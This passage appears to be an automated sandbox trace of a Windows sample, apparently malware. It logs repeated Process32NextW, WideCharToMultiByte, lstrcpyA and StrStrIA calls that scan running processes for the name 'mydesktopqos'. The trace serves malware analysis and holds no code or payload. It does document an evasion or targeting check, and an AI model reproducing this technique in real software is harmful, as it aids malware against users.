WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x35731e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0095.491] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0095.492] StrStrIA (lpFirst="pending.exe", lpSrch="mydesktopqos") returned 0x0 [0095.492] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0095.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0095.493] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356aa38 [0095.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356aa38, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0095.493] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0095.493] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="mydesktopqos") returned 0x0 [0095.493] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0095.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.494] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3574868 [0095.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x3574868, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0095.494] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0095.494] StrStrIA (lpFirst="swing prefer.exe", lpSrch="mydesktopqos") returned 0x0 [0095.494] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0095.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0095.495] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356aa60 [0095.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356aa60, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0095.495] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0095.495] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="mydesktopqos") returned 0x0 [0095.496] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0095.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.497] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3574908 [0095.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3574908, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0095.497] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0095.497] StrStrIA (lpFirst="nights-attending.exe", lpSrch="mydesktopqos") returned 0x0 [0095.497] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0095.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.498] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3573098 [0095.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3573098, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0095.498] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0095.498] StrStrIA (lpFirst="installed.exe", lpSrch="mydesktopqos") returned 0x0 [0095.498] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0095.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0095.499] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356aa88 [0095.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356aa88, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0095.499] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0095.499] StrStrIA (lpFirst="references compounds.exe", lpSrch="mydesktopqos") returned 0x0 [0095.500] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0095.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.501] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3574a48 [0095.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3574a48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0095.501] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0095.501] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="mydesktopqos") returned 0x0 [0095.501] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0095.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.502] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3574888 [0095.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x3574888, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0095.502] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0095.502] StrStrIA (lpFirst="registered try.exe", lpSrch="mydesktopqos") returned 0x0 [0095.502] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0095.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0095.520] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356aab0 [0095.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356aab0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0095.520] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0095.520] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="mydesktopqos") returned 0x0 [0095.520] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0095.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.521] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573218 [0095.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3573218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0095.521] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0095.521] StrStrIA (lpFirst="invite.exe", lpSrch="mydesktopqos") returned 0x0 [0095.521] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0095.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.522] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3573230 [0095.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3573230, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0095.522] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0095.522] StrStrIA (lpFirst="idol.exe", lpSrch="mydesktopqos") returned 0x0 [0095.522] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0095.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0095.523] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356aad8 [0095.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356aad8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0095.523] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0095.523] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="mydesktopqos") returned 0x0 [0095.523] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0095.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0095.524] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356ab00 [0095.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356ab00, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0095.524] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0095.524] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="mydesktopqos") returned 0x0 [0095.524] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0095.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.525] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35732a8 [0095.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x35732a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0095.525] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0095.525] StrStrIA (lpFirst="powell_jane.exe", lpSrch="mydesktopqos") returned 0x0 [0095.525] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0095.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.527] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3574b88 [0095.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x3574b88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0095.527] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0095.527] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="mydesktopqos") returned 0x0 [0095.527] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0095.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.528] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35730b0 [0095.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x35730b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0095.528] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0095.528] StrStrIA (lpFirst="gainedshape.exe", lpSrch="mydesktopqos") returned 0x0 [0095.528] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0095.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.529] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3574a28 [0095.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x3574a28, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0095.529] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0095.529] StrStrIA (lpFirst="opens-versions.exe", lpSrch="mydesktopqos") returned 0x0 [0095.529] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0095.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0095.530] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356ab28 [0095.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356ab28, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0095.530] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0095.530] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="mydesktopqos") returned 0x0 [0095.530] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0095.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.531] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35730c8 [0095.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x35730c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0095.531] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0095.531] StrStrIA (lpFirst="3dftp.exe", lpSrch="mydesktopqos") returned 0x0 [0095.531] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0095.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.532] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3574ac8 [0095.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3574ac8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0095.532] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0095.532] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="mydesktopqos") returned 0x0 [0095.532] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0095.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.533] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35730e0 [0095.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x35730e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0095.533] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0095.534] StrStrIA (lpFirst="alftp.exe", lpSrch="mydesktopqos") returned 0x0 [0095.534] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0095.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.535] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35735d8 [0095.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x35735d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0095.535] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0095.535] StrStrIA (lpFirst="barca.exe", lpSrch="mydesktopqos") returned 0x0 [0095.535] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, 